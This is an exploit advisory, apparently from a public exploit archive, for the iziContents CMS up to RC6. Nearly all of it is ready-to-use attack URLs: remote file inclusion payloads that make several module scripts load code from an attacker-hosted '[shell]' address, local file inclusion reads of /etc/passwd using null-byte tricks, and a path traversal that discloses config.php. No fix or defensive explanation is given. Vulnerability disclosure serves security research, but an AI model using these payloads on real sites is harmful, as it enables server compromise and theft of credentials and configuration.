iziContents <= RC6 (RFI-LFI) Multiple Remote Vulnerabilities

2007-09-21 00:00:00

# o [bug] /"*._ _ #
# . . . .-*'` `*-.._.-'/ #
# o o < * )) , ( #
# . o `*-._`._(__.--*"`.\ #
# #
# vuln.: iziContents <= RC6 (RFI/LFI) Multiple Remote Vulnerabilities #
# author: [email protected] #
# download: #
# http://www.izicontents.com/download/iziContents1RC6.zip #
# #
# greetz: cOndemned, kacper ;> #


# remote file inclusion:
http://[site]/[path]/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=http://[shell]?
http://[site]/[path]/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://[shell]?
http://[site]/[path]/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=http://[shell]?
http://[site]/[path]/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=http://[shell]?
http://[site]/[path]/modules/links/submit_links.php?rootdp=zZz&gsLanguage=http://[shell]?

# local file inclusion:
http://[site]/[path]/modules/poll/poll_summary.php?rootdp=zZz&admin_home=/etc/passwd%00
http://[site]/[path]/include/db.php?rootdp=/etc/passwd%00

# remote file disclosure:
http://[site]/[path]/include/tinymce/tiny_mce_gzip.php?theme=../../config.php%00

#

Fixes

No fixes

In order to submit a new fix you need to be registered.